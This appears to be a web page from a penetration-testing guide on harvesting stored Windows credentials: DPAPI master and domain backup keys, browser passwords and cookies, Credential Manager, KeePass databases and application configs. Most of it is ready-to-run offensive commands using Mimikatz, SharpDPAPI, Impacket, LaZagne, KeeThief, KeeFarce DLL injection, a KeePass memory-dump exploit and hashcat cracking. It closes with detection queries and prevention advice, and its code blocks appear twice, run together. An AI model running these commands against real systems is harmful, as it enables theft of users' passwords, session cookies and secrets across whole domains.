Credential Harvesting
Beyond LSASS dumping, Windows stores credentials in numerous locations โ DPAPI-protected blobs, browser password stores, Windows Credential Manager, password managers, and application config files. This guide covers systematic extraction of credentials from all major stores with modern tooling.
Warning
Credential harvesting accesses user-specific data protected by DPAPI keys. Document all credential
stores accessed and ensure scope authorizes accessing stored passwords and secrets.
๐ Quick Navigation
๐ DPAPI
๐ Application Creds
๐ก๏ธ Defense
DPAPI Fundamentals
The Data Protection API (DPAPI) is Windows' built-in encryption framework used by browsers, Credential Manager,
RDP passwords, Wi-Fi keys, and countless applications. Each user has master keys (derived from their password)
stored in %APPDATA%\Microsoft\Protect\{SID}\. The domain also maintains a backup key for recovery.
DPAPI Key Extraction
powershell
# SharpDPAPI โ comprehensive DPAPI triage (run as target user or SYSTEM)
SharpDPAPI.exe triage
# Dump all DPAPI master keys (requires SYSTEM)
SharpDPAPI.exe masterkeys /rpc
# Decrypt all DPAPI blobs with recovered master keys
SharpDPAPI.exe credentials /mkfile:masterkeys.txt
SharpDPAPI.exe vaults /mkfile:masterkeys.txt
# Mimikatz โ DPAPI module
sekurlsa::dpapi # Extract DPAPI keys from memory
dpapi::masterkey /in:"path\to\masterkey" /rpc # Decrypt with DC
dpapi::cred /in:"path\to\credential_blob" /masterkey:<key>
# Impacket (remote)
dpapi.py unprotect -file credential.blob -key <masterkey># SharpDPAPI โ comprehensive DPAPI triage (run as target user or SYSTEM)
SharpDPAPI.exe triage
# Dump all DPAPI master keys (requires SYSTEM)
SharpDPAPI.exe masterkeys /rpc
# Decrypt all DPAPI blobs with recovered master keys
SharpDPAPI.exe credentials /mkfile:masterkeys.txt
SharpDPAPI.exe vaults /mkfile:masterkeys.txt
# Mimikatz โ DPAPI module
sekurlsa::dpapi # Extract DPAPI keys from memory
dpapi::masterkey /in:"path\to\masterkey" /rpc # Decrypt with DC
dpapi::cred /in:"path\to\credential_blob" /masterkey:<key>
# Impacket (remote)
dpapi.py unprotect -file credential.blob -key <masterkey>Domain DPAPI Backup Key
The DC stores a DPAPI backup key that can decrypt any user's master keys. Requires Domain Admin to extract.
bash
# Mimikatz
lsadump::backupkeys /system:dc01.corp.local /export
# Impacket
dpapi.py backupkeys -t dc01.corp.local 'corp.local/admin:Password1'
# With the domain backup key, decrypt any user's master keys:
dpapi.py masterkey -file user_masterkey -pvk domain_backupkey.pvk
# Then decrypt their credentials, browser passwords, etc.
SharpDPAPI.exe /pvk:domain_backupkey.pvk credentials# Mimikatz
lsadump::backupkeys /system:dc01.corp.local /export
# Impacket
dpapi.py backupkeys -t dc01.corp.local 'corp.local/admin:Password1'
# With the domain backup key, decrypt any user's master keys:
dpapi.py masterkey -file user_masterkey -pvk domain_backupkey.pvk
# Then decrypt their credentials, browser passwords, etc.
SharpDPAPI.exe /pvk:domain_backupkey.pvk credentialsInformation
DA โ Everything: With the domain DPAPI backup key, you can decrypt EVERY domain user's
browser passwords, saved RDP credentials, Wi-Fi keys, and application secrets โ even offline from NTDS backups.
Browser Credential Extraction
Chrome / Edge (Chromium-Based)
Chromium browsers store passwords in SQLite (Login Data) encrypted with DPAPI.
Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data ยท
Edge: %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data
powershell
# SharpChromium โ extract Chrome/Edge passwords, cookies, history
SharpChromium.exe logins
SharpChromium.exe cookies
SharpChromium.exe history
# SharpDPAPI โ browser triage
SharpDPAPI.exe chromium /browser:chrome
SharpDPAPI.exe chromium /browser:edge
# From Linux with the user's master key
python3 chrome_decrypt.py --browser chrome --masterkey <key>
# HackBrowserData โ multi-browser extraction
hack-browser-data.exe -b chrome,edge,firefox
# Seatbelt โ enumerate saved browser credentials
Seatbelt.exe -group=user -outputfile=seatbelt.json# SharpChromium โ extract Chrome/Edge passwords, cookies, history
SharpChromium.exe logins
SharpChromium.exe cookies
SharpChromium.exe history
# SharpDPAPI โ browser triage
SharpDPAPI.exe chromium /browser:chrome
SharpDPAPI.exe chromium /browser:edge
# From Linux with the user's master key
python3 chrome_decrypt.py --browser chrome --masterkey <key>
# HackBrowserData โ multi-browser extraction
hack-browser-data.exe -b chrome,edge,firefox
# Seatbelt โ enumerate saved browser credentials
Seatbelt.exe -group=user -outputfile=seatbelt.jsonFirefox
Firefox uses NSS (not DPAPI). Passwords stored in logins.json,
key in key4.db (encrypted with master password or blank).
bash
# firepwd.py โ decrypt Firefox passwords
python3 firepwd.py -d "%APPDATA%\Mozilla\Firefox\Profiles\abc123.default"
# SharpWeb โ extract from multiple browsers
SharpWeb.exe all
# If master password is set, need to crack it first
# Extract key4.db and use firefox2hashcat
python3 firefox2hashcat.py key4.db > ff_hash.txt
hashcat -m 26100 ff_hash.txt wordlist.txt# firepwd.py โ decrypt Firefox passwords
python3 firepwd.py -d "%APPDATA%\Mozilla\Firefox\Profiles\abc123.default"
# SharpWeb โ extract from multiple browsers
SharpWeb.exe all
# If master password is set, need to crack it first
# Extract key4.db and use firefox2hashcat
python3 firefox2hashcat.py key4.db > ff_hash.txt
hashcat -m 26100 ff_hash.txt wordlist.txtWindows Credential Manager
Credential Manager stores saved credentials for websites, network shares, RDP connections, and applications.
Credentials are in %APPDATA%\\Microsoft\\Credentials\ and protected by DPAPI.
powershell
# List saved credentials (as the user)
cmdkey /list
# SharpDPAPI โ decrypt Credential Manager entries
SharpDPAPI.exe credentials
SharpDPAPI.exe vaults
# Mimikatz โ vault enumeration and decryption
vault::list
vault::cred /patch
# Decrypt specific credential files
dpapi::cred /in:"%APPDATA%\Microsoft\Credentials\<GUID>" /masterkey:<key>
# Seatbelt โ enumerate
Seatbelt.exe CredFiles WindowsCredentialFiles WindowsVault
# LaZagne โ automated multi-source credential extraction
lazagne.exe all
# NetExec โ remote credential extraction (requires admin)
nxc smb target -u admin -p 'Password1' -M dpapi# List saved credentials (as the user)
cmdkey /list
# SharpDPAPI โ decrypt Credential Manager entries
SharpDPAPI.exe credentials
SharpDPAPI.exe vaults
# Mimikatz โ vault enumeration and decryption
vault::list
vault::cred /patch
# Decrypt specific credential files
dpapi::cred /in:"%APPDATA%\Microsoft\Credentials\<GUID>" /masterkey:<key>
# Seatbelt โ enumerate
Seatbelt.exe CredFiles WindowsCredentialFiles WindowsVault
# LaZagne โ automated multi-source credential extraction
lazagne.exe all
# NetExec โ remote credential extraction (requires admin)
nxc smb target -u admin -p 'Password1' -M dpapiKeePass Extraction
KeePass databases (.kdbx) are encrypted with a master password. Several attack vectors exist.
bash
# CVE-2023-32784 โ KeePass < 2.54 memory dump (extracts master password)
KeePassDumpMasterKey.exe
python3 keepass-dump-masterkey.py kdmp.dmp # from a process dump
# KeeThief โ extract master key from running KeePass process
KeeThief.exe
# KeeFarce โ DLL injection to export all passwords to CSV
KeeFarce.exe
# Offline cracking if you have the .kdbx file
keepass2john database.kdbx > keepass_hash.txt
hashcat -m 13400 keepass_hash.txt wordlist.txt
john --format=KeePass keepass_hash.txt --wordlist=wordlist.txt
# Search for kdbx files on network shares
dir \\fileserver\share\ /s /b | findstr /i "\.kdbx$"
nxc smb targets.txt -u user -p Pass123 --spider . --regex "\.kdbx$"# CVE-2023-32784 โ KeePass < 2.54 memory dump (extracts master password)
KeePassDumpMasterKey.exe
python3 keepass-dump-masterkey.py kdmp.dmp # from a process dump
# KeeThief โ extract master key from running KeePass process
KeeThief.exe
# KeeFarce โ DLL injection to export all passwords to CSV
KeeFarce.exe
# Offline cracking if you have the .kdbx file
keepass2john database.kdbx > keepass_hash.txt
hashcat -m 13400 keepass_hash.txt wordlist.txt
john --format=KeePass keepass_hash.txt --wordlist=wordlist.txt
# Search for kdbx files on network shares
dir \\fileserver\share\ /s /b | findstr /i "\.kdbx$"
nxc smb targets.txt -u user -p Pass123 --spider . --regex "\.kdbx$"Other Application Credentials
| Source | Location / Notes |
|---|---|
| Wi-Fi | DPAPI-protected wireless profiles |
| PuTTY/WinSCP | Registry or ini file saved sessions |
| mRemoteNG | confCons.xml (default or custom key) |
| Sticky Notes | plum.sqlite in MicrosoftStickyNotes package |
| PSReadline | PowerShell history may contain plaintext passwords |
| IIS AppPools | applicationHost.config passwords |
| Unattend.xml | Deployment passwords in Panther directory |
powershell
# Wi-Fi passwords
netsh wlan show profiles
netsh wlan show profile name="WiFiName" key=clear
dpapi::wifi
# PuTTY saved sessions
reg query "HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions" /s
# mRemoteNG
python3 mremoteng_decrypt.py confCons.xml
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
# IIS Application Pool passwords
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
# Unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\unattend\Unattend.xml
# LaZagne โ all-in-one extraction
lazagne.exe all -oJ -output results.json# Wi-Fi passwords
netsh wlan show profiles
netsh wlan show profile name="WiFiName" key=clear
dpapi::wifi
# PuTTY saved sessions
reg query "HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions" /s
# mRemoteNG
python3 mremoteng_decrypt.py confCons.xml
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
# IIS Application Pool passwords
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
# Unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\unattend\Unattend.xml
# LaZagne โ all-in-one extraction
lazagne.exe all -oJ -output results.jsonDetection & Blue Team
| Source | Detection |
|---|---|
| Sysmon Event 1 | Known credential harvesting tools (SharpDPAPI, LaZagne, SharpChromium) |
| Sysmon Event 11 | File access to Login Data, Cookies, key4.db, or DPAPI master key paths |
| Event 4662 | DPAPI backup key access on DC (ms-BKRP-BackupKey GUID) |
| EDR | Process accessing browser credential files, SQLite operations on Login Data |
text
// KQL โ Detect DPAPI backup key retrieval from DC
SecurityEvent
| where EventID == 4662
| where Properties contains "BCKUPKEY"
| project TimeGenerated, SubjectUserName, ObjectName, IpAddress
// Detect browser credential file access
DeviceFileEvents
| where FileName in ("Login Data", "Cookies", "key4.db", "logins.json")
| where InitiatingProcessFileName !in ("chrome.exe","msedge.exe","firefox.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, FolderPath// KQL โ Detect DPAPI backup key retrieval from DC
SecurityEvent
| where EventID == 4662
| where Properties contains "BCKUPKEY"
| project TimeGenerated, SubjectUserName, ObjectName, IpAddress
// Detect browser credential file access
DeviceFileEvents
| where FileName in ("Login Data", "Cookies", "key4.db", "logins.json")
| where InitiatingProcessFileName !in ("chrome.exe","msedge.exe","firefox.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, FolderPathPrevention
Enterprise Password Managers
Use enterprise password managers with MFA instead of browser saved passwords or Credential Manager.
Credential Guard
Enable Windows Credential Guard to isolate DPAPI operations in a secure enclave.
Browser Policy
Disable browser password saving via GPO and redirect to enterprise password manager extensions.
Update KeePass
Ensure KeePass is updated to 2.54+ to patch CVE-2023-32784 (memory master password leak).